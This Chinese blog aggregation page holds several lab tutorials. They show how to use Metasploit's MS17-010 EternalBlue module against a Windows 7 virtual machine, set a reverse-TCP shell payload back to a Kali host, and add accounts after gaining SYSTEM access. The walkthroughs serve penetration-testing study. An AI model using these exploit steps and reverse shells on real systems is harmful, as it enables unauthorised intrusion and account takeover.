精华内容
下载资源
问答
  • msf渗透攻击
    2022-06-12 16:01:56

    利用win7系统漏洞“永恒之蓝”,漏洞编号MS17-010,是windows系统的一个底层的服务的漏洞

    在这里插入图片描述

    一、准备阶段

    配置两台虚拟机在一个网段下(即在同一跳内),配置方法为将网络连接设置为桥接模式

    在这里插入图片描述
    Win7 网络连接检查命令:ipconfig
    在这里插入图片描述
    Linux下:ifconfig

    二、具体过程

    使用 MSF 渗透攻击 win7 主机并远程执行命令

    2.1 打开 msf

    在这里插入图片描述

    2.2 查找相应的模块 search ms17-010

    在这里插入图片描述
    auxiliary是辅助模块

    search命令找寻关于ms17_010 的可运行模块

    2.3 加载模块

    在这里插入图片描述

    use 指令,调用模块进行扫描,侦察靶机是否具备被攻击的条件

    2.4 查看参数

    在这里插入图片描述

    通过show options 查看需要配置的参数,并用set进行配置,后面显示yes的必须设置

    2.5 设置参数

    在这里插入图片描述在这里插入图片描述

    这里的ip为 靶机win7 的地址

    2.6 查找攻击模块

    若为【-】
    以上说明已经打了改漏洞的补丁
    刚才这个过程,是通过辅助模块探测目标主机的系统是否存在该漏洞。
    下图的目标主机存在该漏洞
    在这里插入图片描述
    设置完成后run 出现【+】表示可以入侵

    2.7 回到 msf 目录下

    在这里插入图片描述
    水印遮挡内容为:back

    2.8 加载模块

    在这里插入图片描述
    开始加载使用入侵模块,进行入侵

    2.9 调用永恒之蓝攻击模块并查看必要参数在这里插入图片描述

    在这里插入图片描述

    2.10 设置参数

    在这里插入图片描述

    2.11 查看payload

    在这里插入图片描述

    使用 show palylods 指令查看可以使用的攻击载荷

    2.12 运用64 为返回shellpayload windos/x64/shell/reverse_tcp

    在这里插入图片描述

    2.13 攻击 run

    在这里插入图片描述
    若失败将靶机防火墙关闭
    拿到shell,渗透完毕

    三、后渗透阶段

    在这里插入图片描述

    针对linux和windows编码不同,转换编码 chcp 65001
    创建zzz和susu 账户

    四、小结

    此次实验的步骤归纳为:
    1、根据CVE 公布的漏洞
    2、查找对应的exploit 模块
    3、添加模块参数
    4、添加 payload 后面
    5、执行exploit 开始攻击

    原理部分:这个漏洞运用了445端口文件共享,smb通信漏洞,进行渗透,平常使用防火墙要一直打开

    更多相关内容
  • 1.什么是永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的...2.通过msf模块获取win7主机远程shell 模块的整体使用流程如下

    1.什么是永恒之蓝?

    永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

    2.通过msf模块获取win7主机远程shell

    模块的整体使用流程如下

    1.我们先扫描目标是否存在ms17-010漏洞

     2.加载对应的模块

     3.查看需要设置的参数

    show options

    4.设置目标主机

    5.开始扫描,run运行

     如图,我们可以确定目标是脆弱的,系统里有ms17-010漏洞。

     6.查找攻击模块

     7.加载攻击模块

    8.查看需要设置的参数

    9.设置目标主机

     10.查看该攻击载荷使用的系统类型show targets

    如图,可以看出永恒之蓝可以针对win7和server 2008操作系统。

     11.查看该模块可以使用的攻击载荷 show payloads

     12.选择攻击模块 show windows/x64/shell

     13.设置攻击载荷 set payload windows/x64/shell/reverse_tcp

    14.设置本地主机 set LHOST 192.168.0.109

    15.查看设置参数

     16.run运行

    如图,渗透成功。

    17.执行一些命令去测试一下

    添加一个账号 

     在win7系统里查看用户。如图,添加成功。

     但是,我们在终端模拟器里看到一些乱码。

     原因是:一个是linux系统,一个是windows系统,编码方式不一样。

    解决办法:chcp 65001

     查看我们的权限。

    如图,可以看到我们是系统最高权限及root权限。

     终端会话:ctrl+c

     拿到会话后,我们将其保存到后台 exploit -j

     此时,会话保存到后台了。我们输入sessions,进行查看。

     记录会话 sessions -i 4

     退出但不断开这个链接 background

     删除会话 sessions -k 4

     3.总结使用metasploit攻击的步骤

    1.查找CVE公布的漏洞

    2.查找对应的exploit模块

    3.配置模块参数

    4.添加payload后门

    5.执行exploit开始攻击

    展开全文
  • 关于使用msf渗透攻击Win7主机并远程执行命令的复习 一、关于环境的搭建 攻击机:kali 靶机:win7 旗舰版 sp1 win版本这里最好就下载我所指出的版本,因为其他版本由于系统和补丁不同可能会出现漏洞无法利用情况 ...

    关于使用msf渗透攻击Win7主机并远程执行命令的复习

    一、关于环境的搭建

    攻击机:kali
    靶机:win7 旗舰版 sp1

    win版本这里最好就下载我所指出的版本,因为其他版本由于系统和补丁不同可能会出现漏洞无法利用情况
    关于kali系统和win7 旗舰版sp1的安装就不多赘述,很多博文都已经讲述

    1.1 打开虚拟机软件,准备开始环境

    在这里插入图片描述

    1.2 打开已经配置好的两个虚拟环境

    在这里插入图片描述
    在这里插入图片描述

    1.3 配置两台虚拟机在一个网段下(即同一局域网内)即仅需将网络配置都置于桥接即可

    在这里插入图片描述
    查看双方ip以确认
    在这里插入图片描述
    在这里插入图片描述
    这样实验环境就搭建完成

    二、开始针对win7的ms17_010进行渗透

    步骤归纳:
    1、查找 CVE 公布的漏洞
    2、查找对应的 exploit 模块
    3、配置模块参数
    4、添加 payload 后门
    5、执行 exploit 开始攻击

    2.1 在kali里运行metasploit所支持的数据库用msfdb run开启并运行msfconsole

    在这里插入图片描述

    2.2 用search命令寻找关于ms17_010的可运用模块

    在这里插入图片描述

    2.3 先运用use指令,调用扫描模块进行扫描,侦测靶机是否具备被攻击条件

    在这里插入图片描述

    2.4 通过show options查看需要配置的参数,并用set进行配置,后面显示yes的必须设置

    在这里插入图片描述

    2.5 设置完成后,run,出现加号显示可以入侵

    在这里插入图片描述
    在这里插入图片描述

    2.6 开始使用入侵模块,进行入侵

    在这里插入图片描述

    2.7 调用永恒之蓝攻击模块

    在这里插入图片描述

    2.8 查看必要参数并且设置

    在这里插入图片描述

    2.9 用show payloads指令查看可以使用的攻击载荷

    在这里插入图片描述

    2.10 运用64为返回shellpayload windows/x64/shell/reverse_tcp

    在这里插入图片描述

    2.11 设置相关参数,并确认必须参数都已经设置好

    在这里插入图片描述

    2.12 run执行入侵

    在这里插入图片描述
    在这里插入图片描述
    拿到shell,渗透完毕

    三、后渗透阶段

    3.1 创建一个admin账户并且,针对linux和windows编码不同,转化编码

    在这里插入图片描述
    在这里插入图片描述

    3.2 去win7上查看是否成功

    在这里插入图片描述
    发现已经成功,完成

    3.3将该进程放到后台,并再次打开

    在这里插入图片描述
    完成!!!

    关于原理方面,这个漏洞就运用了445端口文件共享,smb通信漏洞,进行渗透,所以大家平时没用445,就关闭就好,防火墙也要记住,一直打开,防火墙规则设置好!!!

    展开全文
  • 使用 msf 渗透攻击 win7 主机并远程执行命令 文章目录使用 msf 渗透攻击 win7 主机并远程执行命令一、扫描局域网存活的主机并判断是否是目标主机1.1 使用 netdiscover 判断该局域网内 IP网段1.2 使用 nmap 扫描 该...

    使用 msf 渗透攻击 win7 主机并远程执行命令


    实验环境

    • Win7 旗舰版 SP1 -64 位
    • kali Linux 2019.1a
    • Nessus

    一、扫描局域网存活的主机并判断是否是目标主机

    1.1 使用 netdiscover 判断该局域网内 IP网段

    打开命令终端输入

    root@fengzilin53:~# netdiscover
    

    image-20210214183459863

    1.2 使用 nmap 扫描 该网段 判断目标主机

    root@fengzilin53:~# nmap -sS -O 192.168.37.0/24
    

    扫描结果为 主机IP地址为 192.168.37.142 是win7 sp1 与目标主机相同

    image-20210214183813931

    二、通过Nessus 扫描该主机漏洞

    Nessus 安装 可用看这篇博客:https://blog.csdn.net/fengzilin1973/article/details/115964676

    浏览器输入 地址打开 nessus https://192.168.37.138:8834/

    输入用户名及密码 root 123456

    image-20210214185648756

    选择高级扫描

    image-20210214185719402

    输入对应的信息

    image-20210214190024785

    启动nessus

    image-20210214190054447

    扫描结果发现该系统存在 ms17-010

    image-20210214191122524

    三、通过msf模块获取win7主机远程shell

    模块的整体使用流程如下

    07.第七章_Metasploit_ms17_010

    我们通过扫描发现目标是存在 ms17-010 漏洞

    打开终端 进入metasploit 并查询漏洞

    root@fengzilin53:~# msfconsole -q
    msf5 > search ms17-010
    

    image-20210214191336238

    使用 use 命令选中 这个模块 并查看模块需要的配置项

    msf5 > use auxiliary/scanner/smb/smb_ms17_010 
    

    image-20210214191522102

    设置主机IP地址 然后运行

    msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.37.142 
    msf5 auxiliary(scanner/smb/smb_ms17_010) > run
    

    运行之后发现该主机容易受到攻击,也验证了 nessus 扫描的漏洞

    image-20210214191739063

    接下来 查找攻击模块进行

    退出上一个

    msf5 auxiliary(scanner/smb/smb_ms17_010) > back
    

    然后搜索模块并使加载该攻击模块

    msf5 > search ms17-010
    msf5 > use exploit/windows/smb/ms17_010_eternalblue
    

    image-20210214192152743

    查看该模块的配置项

    msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 
    

    image-20210214192229080

    设置该配置选项

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.37.142
    

    image-20210214192817015

    查看 exploit target 目标类型

    msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets 
    

    可以看到这个模块只有一个 target,所以默认就选择这个目标系统。不需要手动设置。

    image-20210214193031916

    找一个payload 获取shell 远程连接权限后,进行远程执行命令

    注:payload 又称为 攻击载荷,主要用来建立目标机和攻击机稳定连接的,可返回shell ,也可以进行程序 注入

    msf5 exploit(windows/smb/ms17_010_eternalblue) > search windows/x64/shell type:payload
    

    我们挑选一个 反弹 shell 的 payload

    image-20210214193425234

    设置 payload

    xploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
    

    image-20210214193928464

    查看配置选项

    msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
    

    image-20210214193912637

    设置一下本机 payload 监听地址

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.37.138 //本机 IP 
    

    image-20210214194142138

    配置完成后开始执行

    msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
    

    image-20210214194622790

    发现已经拿到 win7的权限了 是乱码,

    image-20210214200221844

    解决方案

    更改终端字符编码即可-选择 配置文件首选项

    image-20210214200308727

    选择最后一个-兼容性-编码-传统 CJK 编码 简体中文-GBK

    image-20210214200358396

    效果

    image-20210214200450654

    输入whoami

    发现是系统权限,也就是window 的最高权限

    image-20210214200631456

    ctrl+c 关闭链接

    y

    image-20210214200748437

    通过会话进行连接目标机

    msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
    

    -j 表示后台执行 渗透目标完成后会创建一个 session 我们可以通过 session 连接目标主机。

    image-20210214201011706

    msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions 
    

    image-20210214201027599

    通过会话 ID 进入会话

    image-20210214201137013

    或者使用 background 退出会话将会话保存到后台并查看

    C:\Windows\system32>background
    
    Background session 2? [y/N]  y
    msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions 
    

    image-20210214201247437

    根据ID结束会话

    msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -k 2
    

    image-20210214201413445

    总结

    总结使用 metasploit 攻击的步骤

    1. 查找 CVE 公布的漏洞
    2. 查找对应的 exploit 模块
    3. 配置模块参数
    4. 添加 payload 后门
    5. 执行 exploit 开始攻击
    展开全文
  • msf渗透命令和后渗透攻击

    千次阅读 2021-11-17 10:09:46
    msf 常用命令 1. msfvenom -platform windows -p windows/meterpreter/reverse_tcp LHOST=本机ip LPROT=4444 EXITFUNC=thread -b '\x00' -f exe-only -o 文件名.exe 生成木马 2. msfconsole 3. use exploit/multi/...
  • MSF渗透模块Meterpreter

    千次阅读 2022-01-27 21:57:47
    最近访问的文件记录enum_applications-安装的软件收集补丁信息键盘记录抓包浏览器系统口令kiwi内网渗透开启远程桌面添加路由445端口扫描哈希值传递攻击-psexecPortfwd端口转发域信息收集密码喷射令牌窃取痕迹清理 ...
  • MSF模拟渗透测试攻击window实例

    千次阅读 2022-04-06 22:04:50
    一次MSF模拟渗透测试攻击window实例
  • 浅谈MSF渗透测试

    2021-02-24 13:49:55
    渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
  • 【渗透工具】MSFconsole进阶:exploits(渗透攻击模块)
  • MSF模拟渗透测试攻击linux实例

    千次阅读 2022-04-09 15:58:35
    MSF模拟渗透测试攻击linux实例
  • Metasploit(MSF)是一个免费的、可下载的框架,通过它可以很容易的获取、开发并且对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 一、MSF常用模块 Auxiliary 辅助模块:为渗透...
  • MSF模拟渗透测试之攻击Android

    千次阅读 2022-04-09 21:36:41
    MSF渗透测试系列之攻击Android
  • MSF内网渗透实战

    千次阅读 2022-05-17 14:33:13
    本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马...
  • MSF渗透攻击

    2021-03-05 22:00:18
    刚获得shell时,该shell是极其脆弱和容易受到攻击的。所以第一步就是要移动这个shell,把它和目标机中的一个稳定的进程绑定在一块。 1.ps命令获取目标机正在运行的进程。 2.getpid获得shell的进程号(PID) 3.通过...
  • MSF渗透测试框架

    2022-04-18 18:56:27
    MSF渗透测试框架 一、模块 模块名 解释 Auxiliaries 辅助模块 Exploit 漏洞利用模块 Payload 攻击载荷模块 Post 后渗透模块 Encoders 编码工具模块 evasion 混淆模块 Meterpreter 后续利用模块 ...
  • MSF渗透测试

    2021-08-12 20:34:31
    MSF入门实验
  • msf渗透实验基本操作(上)

    千次阅读 2021-11-23 18:23:26
    (3)Metasploit后渗透攻击 (4)Metasploit内网攻击 2.基本要求 (1)掌握Metasploit架构及使用流程; (2)掌握Metasploit主机扫描、漏洞利用; (3)掌握Metasploit后渗透攻击技术; (4)掌握Metasploit...
  • MSF渗透实验

    2021-08-11 20:22:45
    浏览器攻击渗透(MS10_018) 环境: 1、虚拟机Windows2003系统(靶机) 2、虚拟机linux2020.2(攻击机) 步骤: 一、启动虚拟机linux2020.2,终端输入msfconsole启动 二、输入指令search ms10_018查看一下,这是...
  • Kali利用msf渗透Windows电脑(超详细)

    万次阅读 多人点赞 2022-03-09 07:56:14
    Msfvenom命令总结大全1.实时监控屏幕run vnc -i 2.打开摄像头webcam_snap 用kali入侵别人的电脑,手机,安卓,苹果,mac,linxu系统,渗透到对方电脑然后展开进攻
  • MSF渗透后日志删除

    2022-06-15 19:36:25
    今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF渗透后日志删除。 一、Windows日志简介 二、Windows日志删除 三、Linux日志删除
  • 【网络安全】MSF内网渗透

    千次阅读 多人点赞 2022-06-04 19:44:54
    内网渗透超级强悍
  • 内网渗透工具MSF使用教程

    千次阅读 2022-04-01 01:47:29
    MSF介绍 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web...
  • MSF渗透Win server 2008 R2

    千次阅读 2020-11-15 11:02:26
    漏洞利用 使用exploit模块进行永恒之蓝攻击 设置payload参数 //选择反向连接reverse,让目标主机主动连接攻击机 set payload windows/x64/meterpreter/reverse_tcp set RHOST 目标主机IP地址 set LHOST 攻击主机IP...
  • msf完整渗透测试

    千次阅读 2021-11-15 21:07:01
    本来是最近打算把时间都花在学c上,渗透目前跟着老师学以后研究,但为了后续上课需求,就必须把这个给拿下了,于是花了今天一天的时间都在研究这个,写一篇详细的实验结果,为了给自己做笔记,也为了刚学msfconsole...
  • 简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~ 1. Metasploit初始化 在使用之前我们需要对Metasploit进行初始化,并启动: 终端窗口的命令行输入如下命令 systemctl start ...
  • MSF多种渗透测试实例合集

    千次阅读 2020-07-13 10:24:47
    MSF多种渗透测试实例合集 声明:本文漏洞均为已发布漏洞,仅供学习实验,切勿违法使用,请自己搭建靶机进行学习。 1.(MS08-067)缓冲区溢出漏洞 漏洞简介: MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区...
  • 渗透测试神器-msf基础

    2021-12-01 02:36:35
    渗透测试在远控,权限维持阶段不可避免的要用到msf,在awd中也会经常用到,msf的功能不可谓不强大
  • msf(The Metasploit framewok)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 msfconsole 作用:管理生成exp,管理...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 5,827
精华内容 2,330
关键字:

msf渗透攻击